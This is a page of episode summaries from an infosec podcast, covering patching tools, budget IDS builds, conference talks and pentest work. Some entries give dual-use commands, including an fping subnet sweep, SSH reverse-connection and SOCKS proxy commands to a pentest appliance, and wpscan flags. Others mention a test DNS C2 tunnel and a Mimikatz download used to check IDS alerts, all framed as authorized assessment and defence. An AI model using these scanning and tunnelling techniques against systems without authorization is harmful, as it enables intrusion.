    • Does one thing (third party patching) and does it really well

    • Extremely affordable

    • User interface is clean, simple and really easy to use/learn

    Cons
    • No "agentless" option - it's an agent or nothin'

    • I'm not sure if Ninite has the brand name recognition and reputation to be accepted/respected by large companies

    • I need to do more homework on how they pull down their packages...are they ripping apart packages and repackaging them at all? That could be a big avenue for side-loading icky stuff.


    7MS #274: Speaking at ILTACON - Part 4 Aug 23, 2017

    I'm back from Vegas! My talk went really well and I'm excited to tell you about it in today's episode. First, some conference/trip highlights:

    During the ILTACON conference I attended a great talk by Don McMillan about how to infuse humor into your work environment. Really enlightening, and you know those things you hear about how humor lowers blood pressure, increases satisfaction and just overall makes you a more pleasant person to be around? Turns out it's true!

    On the day before my presentation I got my first experience touring around the Vegas strip, and the people watching did not disappoint. I also saw the Muhammad Ali and Van Gogh exhibits, which were awesome.

    When it came to the actual talk, everything went really well. The audio/visual stuff all worked perfect, and I felt the content delivery went over well too. People asked a lot of questions and even hung out afterwards to discuss security topics further.

    There were two big surprises I wasn't expecting, though:

    1. A podcast listener was at the conference, and shared with me that after listening to lots of 7MS episodes, he always figured I looked like Jared from Subway. :-(

    2. There were super talented artists from a company called Filament did a comic-book style retelling of my talk live as I was doing it. I love crazy-talented people like this, so I was totally geeking out. I reposted the renderings (with their permission) at my personal portfolio site if you wanna check 'em out.


    7MS #273: Speaking at ILTACON - Part 3 Aug 17, 2017

    I ran out of time in episode #272 to tell you about why preparing to be a speaker for ILTACON was way more stressful that preparing for Secure360 a few months ago. The main points of difference/stress were:

    • ILTA wanted to see PowerPoint deck progress weekly, whereas with Secure360 it was pretty much "Your talk is accepted - see you at the conference!"

    • ILTA is going to show a "speaker slide" with bio a few minutes before the sessions starts. That way the session is focused on content (and probably avoids people who like to talk about themselves too much :-)

    • ILTA requested my PowerPoint and handouts a few weeks before the session so they could put on their Web site for attendees to see. Although that put some pressure on me to get content done early, I think it's great because presumably some people at the talk will have screened the content and therefore be more tuned in.


    7MS #272: Speaking at ILTACON - Part 2 Aug 17, 2017

    This is part 2 of a series focusing on public speaking - specifically for the ILTACON conference happening in Vegas this week.

    In this episode I share a high-level walkthrough of my talk and the 10 "Blue Team on a Budget" tips that the talk will focus on. These tips include:

    • Turning up Windows auditing and PowerShell logging
    • Installing Sysmon
    • Installing Security Onion
    • Don't put too much faith in endpoint protection
    • Keep an eye on Active Directory
    • Install RITA
    • Deploy a Canary
    • Use strong passwords
    • Install LAPS
    • Scan and patch all your things

    7MS #271: Patching Solutions Bake-Off - Part 1 Aug 10, 2017

    Seems like every business I meet with needs some sort of help in the patching department. Maybe they've got the Microsoft OS side of the house under control, but the third-party stuff is lacking. Or vice-versa. Either way, the team I work with is excited to kick the tires of some popular patching solutions over the next few weeks, and we'll audibly barf up what we learn into this mini-series!

    Solutions we'll poke around with include:

    • Ninite
    • ManageEngine
    • PDQ Deploy

    PS: None of these solutions are sponsoring 7MS. They're just popular patching solutions we're trying out to learn more about 'em and give you the pros/cons we discover!

    In today's episode I dive a bit into...

    Ninite Pros
    • Cheap
    • Does one thing, and does it well
    • Been around for a long time
    • Cloud-based - doesn't rely on LAN-side server
    Cons
    • Only cloud-based...no LAN-side option
    • Requires an agent
    • Agent's only purpose is patching - no extra bells/whistles like remote control or inventorying capability

    7MS #270: IDS on a Budget - Part 4 Aug 03, 2017

    I spent a bunch of time with Security Onion the last couple week's and have been lovin' it! I ran the install, took all the defaults, ran the updates, and pretty much just let it burn in on my prod (home) environment.

    After a few days, I went back to check the Security Onion dashboard to check the alerts. There was a bunch of benign stuff (computers pinging each other, Dropbox broadcasting to the network) but also a couple interesting finds - SO caught one of my VMs downloading (intentionally) Invoke-Mimikatz. The dashboard allows you to see transcripts of file downloads like this, as well as a tool called Network Miner to extract a copy of the downloaded file for further analysis.

    One thing the SO didn't pick up on was the DNS-based C2 tunnel I setup on a test victim client. However, it turns out RITA works great for exactly this type of analysis - it reported the huge number of DNS requests from my victim client to the C2 server. Very helpful info for an incident response situation!


    7MS #269: Documentation Jul 27, 2017

    Documentation is super boring, right? Yet it's critical to getting your client/audience excited about making their security better!

    In this episode I talk about my mixed feelings towards the "big" standards like ISO/NIST/etc. and how a more tactical, down-to-earth documentation approach might be more effective in some cases. And I think we need our documentation to be much more focused on consultation/remediation and not just "Hey, your security sucks...and these next 100+ pages will tell you exactly why!" We can do better!

    Yes, this episode is like 18 minutes because, well, I guess I'm really passionate about documentation. :-)


    7MS #268: IDS on a Budget - Part 3 Jul 19, 2017

    Been having a blast working with the beta branch of the Sweet Security project and it anxious to try the latest fixes of the beta branch. Give it a look!

    I also spent a lot of time the last few nights playing with Security Onion and love it. After zipping through the install wizard and hitting reboot a few times you're pretty much good to go. A few recommendations I'd make after those initial reboots though:

    • Run the soup command to update Security Onion with all the latest packages

    • Use ufw to adjust the internal firewall to allow management from ports other than SSH (which is already preconfigured)

    • On a side note, I think you might have to have your vnic in VMWare set to promiscuous mode in order to allow proper network sniffing.

    • Do a wget http://testmyids.com to ensure Security Onion alerts are coming in the squil dashboard security alerts are pouring in.

    Also, check out this article for some handy tips on threat hunting with Bro.

    Next up on my "test this out list" is to setup DNS tunneling to a Digital Ocean droplet I setup, and see if the onion picks up on that, or if I can at least get warned somehow about a high amount of DNS traffic.


    7MS #267: Backup Disasters Jul 18, 2017

    Today's episode is a horror story about how I recently lost 5+ years of CrashPlan backups due to what I'm calling a...small clerical error.

    Yes, this oopsie was 100% my fault, but I think backup providers can do a better job of warning us (via text or automated call rather than just email) before blowing away our life's work.


    7MS #266: IDS on a Budget - Part 2 Jul 13, 2017

    This week I've continued to play with the awesome Sweet Security IDS solution you can throw on a Raspberry Pi 3. A big update to share is that there is a beta branch which has some cool new features, such as the ability to break the Bro + ELK stack across multiple machines.

    I also lost a lot of sleep these last few days playing with Security Onion and will do a future episode focusing only on that!


    7MS 265: IDS on a Budget - Part 1 Jul 05, 2017

    I've been wanting to get a Bro IDS installed for a long time now - and for several reasons:

    1. It looks fun!

    2. My customers have expressed interest

    3. It will be part of my upcoming ILTACON session.

    So this weekend I started getting the hardware portion ready, which includes:

    • Ubiquiti Edge Router X (~$99)

    • TP-Link TL-SG105E (~$35)

    • CanaKit Raspberry Pi 3 Complete Starter Kit (~$70)

    If you need additional information such as screenshots/configs etc to get the VLANs passing properly from the Edge Router X to TP-LINK switch, let me know. Otherwise for now I'm just focusing on crafting content for part 2, where we'll dive into actually turning the Pi into a Bro sensor using Sweet Security.


    7MS #264: Hacking Wordpress Jun 29, 2017

    I was pleasantly surprised to see a Wordpress site fall into a pentest scope this past week. One helpful tool to get familiar with when attacking Wordpress sites is wpscan, which is built right into Kali - or you can grab it from GitHub. Get familiar with the command line flags as they can help you conduct a more gentle scan that recovers from site errors/disconnections more easily. Specifically, read up on these options:

    • --throttle - for example, I've been using --throttle 1000 in order to be a bit less intense on my target site

    • --request-timeout and --connect-timeout help your scan recover smoothly from site errors/timeouts

    Also, if you find yourself in a situation where you're testing a production Wordpress sight (not recommended), consider setting up a free up/downtime alert via a free service like Uptime Robot so you can get emails if the site ever poops out. That certainly beats hitting F5 in Firefox every 10 seconds :-)


    7MS #263: Make Nessus Reporting Fun Again! Jun 25, 2017

    Tell me I can't be the only one who regularly wants to combine a bunch of small Nessus scans files into a big fat Nessus scan file, and then make pretty pictures/graphs/summaries that the customer can easily understand?

    Over the last few weeks I must've tried every Powershell and Python script I could get my hands on, yet still didn't find the magic bullet solution. That is, until I found this little beauty of a tool: NamicSoft. It's a $65 tool for Windows that will not only combine multiple Nessus files into one huge file, but it offers a ton of export/reporting features to make the Nessus data more valuable. Oh, and it can also digest Burp and Nexpose data as well!

    More on today's episode...


    7MS #262: Speaking at ILTACON Jun 14, 2017

    Through kind of a weird series of events, I have an opportunity to speak at ILTACON this summer in Vegas (baby!). I'll be talking about some things you can do if you suspect your perimeter is breached, as well as low-hanging fruit you can implement to better defend against breaches. I'm pumped. And I've done the most important part and chosen a PowerPoint theme: A Few Good Men :-)

    I've spoken with some of you in the past and know a few of you spend your days and sleepless nights hunting threats. If so I'd love to talk to you to get some creative ideas as it relates to crafting the session content.


    7MS #261: Blind Network Security Assessments Jun 07, 2017

    This week I had the fun opportunity to do a "blind" network security assessment - where basically we had to step into a network we'd never seen before and make some security posture recommendations. I've found that the following software/hardware is quite helpful for this type of assessment:

    • The PwnPulse helps a ton in scanning wired and wireless networks...and even Bluetooth! I've covered the Pulse in past episodes - check out part 1 and part 2.

    • Network Detective will do a ton of helpful Active Directory enumeration and point out potential red flags, such as:

      • Accounts that haven't been logged into for a long time
      • Accounts with passwords that haven't been refreshed in a long time
      • Privileged groups that need review (Domain Admins, Enterprise Admins, etc.)
    • AD policy issues (*warning: by default Network Detective only pulls back a few policies by default. Check out scripts such as my Environment Check to grab a dump of all GPOs.

    • Thycotic Privileged Account Discovery is a free tool that can crawl AD workstations and enumerate the local administrator accounts on each machine. It makes a good case for implementing LAPS.


    7MS #260: PwnPro 101 - Part 2 Jun 02, 2017

    I'm continuing to love the our PwnPro and had a chance to use it on a customer assessment this week. For the most part the setup/install was a breeze. Just had a few hiccups that the Pwnie support team straightened me out on right away.

    In the episode I mention some command line tools and syntax that helped me work with the Pulse. One was using fping to sweep large subnets and accurately find live hosts:

    fping -a -g 10.0.5.0/16 > blah.txt

    Then, to setup the reverse shell, I just forwarded port 22 from my Ubiquiti gear to my internal Kali host, and then ran this to make the reverse connection:

    ssh pwnie@localhost -p 3333

    Lastly, to setup the reverse shell so you can proxy Web traffic to an alternate host/port, such as the Nessus port, setup your shell like so:

    ssh pwnie@localhost -p 3333 -ND 8080

    Then leave that window open and setup your Web browser so that you do a SOCKS5 proxy to localhost:8080. Finally, visit http://ip.of.your.host:XXXX. So if your Pulse was 1.2.3.4 and had Nessus running, you'd visit https://1.2.3.4:8834.

    Enjoy!


    7MS #259: OFF-TOPIC - Home Robbery Attribution May 25, 2017

    Warning! Warning! This is an off-topic episode!

    I try really hard to create valuable weekly content about IT/security. However, sometimes a virtual grenade goes off in my life and prevents me from having the necessary time/resources to get my act together. This has been one of those weeks. :-)

    So today I'm going off-topic and talking about an alleged burglary of some electronics at my home. And once we identified the culprit, wow...nobody was more surprised than me.


    7MS #258: Speaking at Secure360 - Part 2 May 18, 2017

    Intro

    I mentioned last week that I was speaking at the Secure360 conference here in the Twin Cities, and at that time I was preparing a talk called Pentesting 101: No Hoodie Required. I was so nervous that I've basically spent the last week breathing heavily into paper bags and wishing I was on sedatives.

    But I have good news to report in today's episode, friends! The talk was very well received and the attendees didn't get out torches and pitchforks! #winning! So today's episode (audio below) talks more about the public speaking experiences and highlights some lessons learned:

    Things I'd do again next time
    • I'd not tempt the demo gods and still pre-record my hacking movies ahead of time. I saw some people do live demos of very technical things and it did not go well for a few of them :-(

    • I would still spend way too many hours cutting together my movies in iMovie so that they followed a good tempo when presented live

    • I would still have a copy of my presentation on two different laptops, 3 USB thumb drives, a cloud copy, and a copy sent to the Secure 360 folks just in case. Backups, backups, backups - am I right?

    What I'd do differently next time
    • I'd hopefully have the preso done a few days (weeks, even!) ahead of time and practice it in front of colleagues to get some feedback.

    • I'd still have a theme to the presentation, but rather than something specific like Terminator 2, maybe I'd go even more general and pick a movie/character that could appeal even more to the masses.

    • I wouldn't worry so much about having a presentation that "nails it" for everybody. That's just not possible! We're all coming from different backgrounds and skillsets. It's not gonna be a home run for everybody.


    7MS #257: Speaking at Secure360 May 11, 2017

    The nervous butterflies are chewing up my organs this week. Why? Because I'm speaking at Secure360 next Tuesday and Wednesday.

    I'm trying to build a presentation that:

    • Appeals to both techie nerds like me, as well as regular human people

    • Strikes a healthy balance between fun and informative

    So, my outline is roughly as follows:

    • Intros
    • Lets talk about pentesting vs. vulnerability scans
    • Build your own hackin' lab for $500!
    • Good/bad training (CEH vs. OSCP)
    • Lets hack some stuff following a methodology!

    Tune in today's episode for more...


    7MS #256: AlienVault Certified System Engineer - Part 2 May 04, 2017

    So a few weeks ago I did an episode about the AlienVault Certified Security Engineer certification, and last Friday I took a stab at the test.

    I failed. It kicked my butt.

    Today I'm here to both rant about the unfairness of the test and offer you some study tips so you don't suffer a similar fate.

    P.S. - you should definitely check out this blog as it's one of the few valuable study guides I could find out there on the Interwebs.


    7MS #255: PwnPro 101 Apr 27, 2017

    I'm kicking the tires on the PwnPro which is an all-in-one wired, wireless and Bluetooth assessment and pentesting tool.

    Upon getting plugged into a network, it peers with a cloud portal and lets you assess and pentest from the comfort of your jammies back at your house! Oh, and did I mention it runs Kali on the back end? Delicious.

    Today's episode dives into some of what I've been learning about the PwnPro as I run it through its paces at work and warm it up for our first customer assessment...


    7MS #254: Bash Bunny Apr 20, 2017

    I've been working with the Bash Bunny for the past few weeks in preparation for a presentation/demo I'm doing in a few weeks. Today I want to talk about what the Bunny is, the cool things it can do, and some of my favorite payloads.

    Also, I started thinking about what conversation topics spawn from a demo of the Bunny. Specifically, I want to know how people would defend against the Bunny using AD policies, peripheral controls, etc. Check out the Hak5 thread I started about this, as it has got some great ideas.


    7MS #253: Desperately Seeking Service Accounts Apr 13, 2017

    Find the show notes here!


    7MS #252: LAPS - Local Administrator Password Solution Apr 06, 2017

    Show notes are here.


    7MS #251: Blackholing Malvertising with Pi-Hole Mar 30, 2017

    Show notes are here


    7MS #250: The PBS Telethon Episode! Mar 23, 2017

    Show notes for today's episode can be found here!


    7MS #249: AlienVault Certified Security Engineer - Part 1 Mar 16, 2017

    Show notes are here.


    7MS #248: How to Hack the 10 O'clock News Mar 09, 2017

    Show notes are here.


    7MS #247: Webapp Pentest Tool Bake-Off - Part 4 Mar 02, 2017

    Show notes are here.


    7MS #246: Webapp Pentest Tool Bake-Off - Part 3 Feb 23, 2017

    Site notes are here. Enjoy.


    7MS #245: Webapp Pentest Tool Bake-Off - Part 2 Feb 17, 2017

    Show notes are here.


    7MS #244: Webapp Pentest Tool Bake-Off - Part 1 Feb 09, 2017

    Show notes are here


    7MS #243: ZOMG Logo Design Contest! Feb 02, 2017

    Here are today's show notes!


    7MS #242: Bye Bye Dream Job - Part 4 Jan 26, 2017

    We've reached the end of this series, and I come into this final chapter bearing good news: I have a job! So in today's episode, I just wanted to kick back and share some cool things I'm working on as I ramp up in this new adventure (and that will also provide good topics for future episodes):

    Webapp pentest tool bake-off

    In the next week I'll be evaluating the following for a more general/automatic Webapp scans:

    • Netsparker
    • HP WebInspect
    • Qualys
    • AppSpider
    SIEM comparison

    We're looking at several tools to do both on-prem and managed SIEM solutions.

    If you've got recommendations or experiences to share I would love to hear them - please contact me. Thanks in advance!


    7MS #241: Bye Bye Dream Job - Part 3 Jan 19, 2017

    Show notes are here


    7MS #240: Bye Bye Dream Job - Part 2 Jan 12, 2017

    Show notes are here.


    7MS #239: Bye Bye Dream Job - Part 1 Jan 05, 2017

    Show notes: https://7ms.us/7ms-239-bye-bye-dream-job-part-1


    7MS #238: Network Monitoring 101 - Part 2: NMAP, Papertrailapp and OpenCanary Nov 30, 2016

    Show notes: https://7ms.us/7ms-238-network-monitoring-101-part-2-nmap-papertrailapp-and-opencanary


    7MS #237: Network Monitoring 101 - Part 1: Nessus Nov 23, 2016

    Show notes: https://7ms.us/7ms-237-network-monitoring-101-part-1-nessus


    7MS #236: From "Derp!" to Domain Admin with MOVEit Central Nov 17, 2016

    Show notes: https://7ms.us/7ms-236-from-derp-to-domain-admin-with-moveit-central


    7MS #235: Pwning Billy Madison Nov 10, 2016

    Show notes: https://7ms.us/7ms-235-pwning-billy-madison


    7MS #234: Pentesting OWASP Juice Shop - Part 5 Nov 04, 2016

    Show notes: https://7ms.us/7ms-234-pentesting-owasp-juice-shop-part5


    7MS #233: Pentesting OWASP Juice Shop - Part 4 Oct 20, 2016

    Show notes: https://7ms.us/7ms-233-pentesting-owasp-juice-shop-part-4/


    7MS #232: Pentesting OWASP Juice Shop - Part 3 Oct 13, 2016

    Show notes: https://7ms.us/7ms-232-pentesting-owasp-juice-shop-part-3


    7MS #231: Pentesting OWASP Juice Shop - Part 2 Oct 06, 2016

    Show notes: https://7ms.us/7ms-231-pentesting-owasp-juice-shop-part-2/


    7MS #230: Pentesting OWASP Juice Shop - Part 1 Sep 28, 2016

    Show notes: https://7ms-230-pentesting-owasp-juice-shop-part-1


    7MS #229: Intro to Docker for Pentesters Sep 22, 2016

    Show notes: https://7ms.us/7ms-229-intro-to-docker-for-pentesters


    7MS #228: Fun with Bettercap Sep 15, 2016

    Show notes: https://7ms.us/7ms-228-fun-with-bettercap/


    7MS #227: Lets Encrypt - Installing SSL Certs for Nessus and Ubiquiti Unifi Sep 07, 2016

    Show notes: https://7ms.us/7ms-227-lets-encrypt-installing-ssl-certs-for-nessus-and-ubiquiti-unifi-2/


    7MS #226: DIY $500 Pentesting Lab - Part 3 Sep 02, 2016

    Show notes: https://7ms.us/7ms-226-diy-500-pentesting-lab-part-3/


    7MS #225: DIY $500 Pentesting Lab - Part 2 Aug 24, 2016

    Show notes: https://7ms.us/7ms-225-diy-500-pentesting-lab-part-2/


    7MS #224: DIY $500 Pentesting Lab - Part 1 Aug 18, 2016

    Show notes: https://7ms.us/7ms-224-diy-500-pentesting-lab-part-1/


    7MS #223: Vulnhub Walkthrough - Tommy Boy Aug 10, 2016

    Show notes: https://7ms.us/7ms-223-vulnhub-walkthrough-tommy-boy/


    7MS #222: OFF-TOPIC - THE FINAL CHAPTER! Aug 10, 2016

    Show notes: https://7ms.us/7ms-222-off-topic-the-final-chapter/


    7MS #221: News and Links Roundup Aug 05, 2016

    Show notes: https://7ms.us/7ms-221-news-and-links-roundup/


    7MS #220: Installing Ubiquiti EdgeRouter X and AP - Part 3 Aug 02, 2016

    Show notes: https://7ms.us/7ms-220-installing-ubiquiti-edgerouter-x-and-ap-part-3/


    7MS #219: News and Links Roundup Jul 29, 2016

    Show notes: https://7ms.us/7ms-219-news-and-links-roundup/


    7MS #218: Off-TOPIC - My Top 5 Favorite and Least Favorite Things About The Division Jul 28, 2016

    Show notes: https://7ms.us/7ms-218-off-topic-my-top-5-favorite-and-least-favorite-things-about-the-division/


    7MS #217: Installing Ubiquiti EdgeRouter X and AP - Part 2 Jul 26, 2016

    Show notes: https://7ms.us/7ms-217-installing-ubiquiti-edgerouter-x-and-ap-part-2/


    7MS #216: News and Links Roundup Jul 22, 2016

    Show notes: https://7ms.us/7ms-216-news-and-links-roundup/


    7MS #215: Installing Ubiquiti EdgeRouter X and AP - Part 1 Jul 21, 2016

    Here you can provide a detailed description about your podcast. You may wish to include: topics that will be discussed, your episode schedule, who hosts the show, any guests that have or will appear and what kind of people may enjoy your show.


    7MS #214: News and Links Roundup Jul 16, 2016

    Show notes: https://7ms.us/7ms-214-news-and-links-roundup/


    7MS #213: Building a Vulnerable VM (The Prequel) Jul 12, 2016

    Show notes: https://7ms.us/7ms-213-building-a-vulnerable-vm-the-prequel/


    7MS #212: News and Links Roundup Jul 08, 2016

    Show notes: https://7ms.us/7ms-211-news-and-links-roundup/


    7MS #211: OFF-TOPIC - IT Horror Stories - Part 2 Jul 07, 2016

    Show notes: https://7ms.us/7ms-211-off-topic-it-horror-stories-part-2/


    7MS #210: Vulnhub Walkthrough - Mr. Robot Jul 04, 2016

    Show notes: https://7ms.us/7ms-210-vulnhub-walkthrough-mr-robot/


    7MS #209: News and Links Roundup Jul 01, 2016

    Show notes: https://7ms.us/7ms-209-news-and-links-roundup/


    7MS #208: OFF-TOPIC - The Jackwagon Who Stole My Drums! Jun 29, 2016

    Show notes: https://7ms.us/7ms-208-off-topic-the-jackwagon-who-stole-my-drums/


    7MS #207: Vulnhub Walkthrough - Sidney Jun 28, 2016

    Show notes: https://7ms.us/7ms-207-vulnhub-walkthrough-sidney/


    7MS #206: Vulnhub Walkthrough - Stapler Jun 20, 2016

    Show notes: https://7ms.us/7ms-206-vulnhub-walkthrough-stapler/


    7MS #205: News and Links Roundup Jun 17, 2016

    Show notes here: https://7ms.us/7ms-205-news-and-links-roundup/


    7MS #204: OFF-TOPIC - IT Horror Stories! Jun 16, 2016

    Show notes: https://7ms.us/7ms-204-off-topic-it-horror-stories/


    7MS #203: Vulnhub Walkthrough - FristiLeaks Jun 14, 2016

    Show notes: https://7ms.us/7ms-203-vulnhub-walkthrough-fristileaks/


    7MS #202: News and Links Roundup Jun 10, 2016

    Show notes: https://7ms.us/7ms-202-news-and-links-roundup/


    7MS #201: OFF-TOPIC - Audio Clip Extravaganza Jun 09, 2016

    Show notes: https://7ms.us/7ms-201-off-topic-audio-clip-extravaganza/


    7MS #200: Vulnhub Walkthrough - Milnet Jun 07, 2016

    Show notes here: https://7ms.us/7ms-200-vulnhub-walkthrough-milnet/


    7MS #199: News and Links Roundup Jun 03, 2016

    Show notes: https://7ms.us/7ms-199-news-and-links-roundup/


    7MS #198: Two Pretty Cool Pentest Stories Jun 02, 2016

    Show notes: https://7ms.us/7ms-198-two-pentest-stories/


    7MS #197: Vulnhub Walkthrough - SickOS 1.2 May 31, 2016

    Show notes: https://7ms.us/7ms-197-vulnhub-walkthrough-sickos-1-2/


    7MS #196: News and Links Roundup May 27, 2016

    Show notes here: https://7ms.us/7ms-196-news-and-links-roundup/


    7MS #195: Why AppSpider is Grinding My Gears May 25, 2016

    Show notes: https://7ms.us/7ms-195-why-appspider-is-grinding-my-gears/


    7MS #194: Vulnhub Walkthrough - Simple May 23, 2016

    Show notes here: https://7ms.us/7ms-194-vulnhub-walkthrough-simple/


    7MS #193: News and Links Roundup May 20, 2016

    Show note here: https://7ms.us/7ms-193-news-and-links-roundup/


    7MS #192: Podcast Like Nobody's Listening and Blog Like Nobody's Reading May 19, 2016

    Show notes here: https://7ms.us/7ms-192-podcast-like-nobodys-listening/


    7MS #191: Vulnhub Walkthrough - Kevgir May 17, 2016

    Show notes: https://7ms.us/7ms-191-vulnhub-walkthrough-kevgir/


    7MS #190: Infosec News and Links Roundup May 13, 2016

    Show notes: https://7ms.us/7ms-190-infosec-news-and-links-roundup/


    7MS #189: OFFTOPIC - Reviews of The Family Fang and Tumbledown May 11, 2016

    Show notes: https://7ms.us/7ms-189-offtopic-reviews-of-the-family-fang-and-tumbledown/


    7MS #188: Vulnhub Walkthrough - DroopyCTF May 09, 2016

    Show notes: https://7ms.us/7ms-188-vulnhub-walkthrough-droopyctf/


    7MS #187: Infosec News and Links Roundup May 06, 2016

    Show notes: https://7ms.us/7ms-187-infosec-news-and-links-roundup/


    7MS #186: OFFTOPIC - Reviews of Brooklyn and The Revenant May 05, 2016

    Show notes: https://7ms.us/7ms-186-offtopic-reviews-of-brooklyn-and-the-revenant/


    7MS #185: Vulnhub Walkthrough - Lord of the Root May 03, 2016

    Show notes here: https://7ms.us/7ms-185-vulnhub-walkthrough-lord-of-the-root/


    7MS #184: Infosec News and Links Roundup Apr 29, 2016

    Show notes here: https://7ms.us/7ms-184-infosec-news-and-links-roundup/


    7MS #183: OFFTOPIC-The Invitation Apr 28, 2016

    Show notes here: https://7ms.us/7ms-183-offtopic-the-invitation/


    7MS #182: Vulnhub Walkthrough - SickOs Apr 25, 2016

    Show notes here: https://7ms.us/7ms-182-vulnhub-walkthrough-sickos/


    7MS #181: Infosec News and Links Roundup Apr 23, 2016

    Show notes here: https://7ms.us/7ms-181-infosec-news-and-links-roundup/


    7MS #180: Vulnhub Walkthrough: Skydog CTF Apr 21, 2016

    Show notes here: https://7ms.us/7ms-180-vulnhub-walkthrough-skydog-ctf/


    7MS #179: Bring New Life to an Old Mac with OSX Server Apr 19, 2016

    Show notes here: https://7ms.us/7ms-179-bring-new-life-to-an-old-mac-with-osx-server/


    7MS #178: Infosec News and Links Roundup Apr 15, 2016

    Show notes here: https://7ms.us/7ms-178-infosec-news-and-links-roundup/


    7MS #177: A Not Totally Sucky Way to Backup and Share Photos Apr 14, 2016

    Show notes are here: https://7ms.us/7ms-177-a-not-totally-sucky-way-to-backup-and-share-photos/


    7MS #176: DIY SSH Honeypot with Cowrie Apr 12, 2016

    Check out the show notes here: https://7ms.us/7ms-176-diy-ssh-honeypot-with-cowrie-2/


    7MS #175: Infosec News and Links Roundup Apr 01, 2016

    Show notes are here: https://7ms.us/7ms-175-infosec-news-and-links-roundup/


    7MS #174: DIY SSH Honeypot with Kippo - Part 2 Mar 31, 2016

    Show notes here: https://7ms.us/7ms-174-diy-ssh-honeypot-with-kippo-part-2/


    7MS #173: DIY SSH Honeypot with Kippo Mar 29, 2016

    Show notes here: https://7ms.us/7ms-173-diy-ssh-honeypot-with-kippo/


    7MS #172: Infosec News and Links Roundup Mar 29, 2016

    Show notes here: https://7ms.us/7ms-172-infosec-news-and-links-roundup/


    7MS #171: OFF-TOPIC - Easter Music Mar 24, 2016

    Show notes (actually, MUSIC notes in this case) can be found here: https://7ms.us/7ms-161-off-topic-easter-music/


    7MS #170: Pentesting in a Vacuum - Part 3 Mar 22, 2016

    Show notes are here: https://7ms.us/7ms-170-pentesting-in-a-vacuum-part-3/


    7MS #169: Infosec News and Links Roundup Mar 19, 2016

    Show notes are here: https://7ms.us/7ms-169-infosec-news-and-links-roundup/


    7MS #168: Upgrading and Securing Your Digital Ocean Ghost Blog Mar 17, 2016

    Show notes are here! Go to https://7ms.us/7ms-168-upgrading-and-securing-your-digital-ocean-ghost-blog/


    7MS #167: My Misadventures with SOAP Web Services Mar 17, 2016

    Show notes are here: https://7ms.us/7ms-167-my-first-dandy-experience-with-soap-web-services/


    7MS #166: Infosec News and Links Roundup Mar 11, 2016

    Show notes are here: https://7ms.us/7ms-166-infosec-news-and-links-roundup/


    7MS #165: DIY Podcast Mar 10, 2016

    Show notes for today's episode are right here: https://7ms.us/7ms-165-diy-podcast/


    7MS #164: Pentesting in a Vacuum - Part 2 Mar 07, 2016

    Check out the show notes for today's episode here: https://7ms.us/7ms-164-pentesting-in-a-vacuum-part-2/


    7MS #163: Infosec News and Links Roundup Mar 04, 2016

    Show notes here: https://7ms.us/7ms-163-infosec-news-and-links-roundup/


    7MS #162: OFF-TOPIC - Deadpool Mar 02, 2016

    Show notes for today's episode are here: https://7ms.us/7ms-162-off-topic-deadpool/


    7MS #161: DIY Wifi Network Graphing & Dojo Scavenger Vulnerable Webapp Feb 29, 2016

    Show notes are here - enjoy! https://7ms.us/7ms-161-diy-wifi-network-graph-and-dojo-scavenger-vulnerable-webapp/


    7MS #160: Infosec News and Links Roundup Feb 26, 2016

    Today's show notes are here: https://7ms.us/7ms-160-friday-infosec-news-and-links-roundup/


    7MS #159: OFF-TOPIC - What Size Company is Right for Me? (and a review of the Steve Jobs movie) Feb 24, 2016

    Today's show notes are here: https://7ms.us/7ms-159-off-topic-what-size-company-is-right-for-me/


    7MS #158: Pentesting in a Vacuum Feb 22, 2016

    Today's swell show notes are at: https://7ms.us/7ms-158-pentesting-in-a-vacuum/


    7MS #157: Infosec News and Links Roundup Feb 19, 2016

    Today's show notes are here: https://7ms.us/7ms-157-infosec-news-and-links-roundup/


    7MS #156: OFF-TOPIC - 3 Ways to be a More Connected Parent Feb 17, 2016

    Today's show notes: https://7ms.us/7ms-156-off-topic-3-ways-to-be-a-more-connected-parent/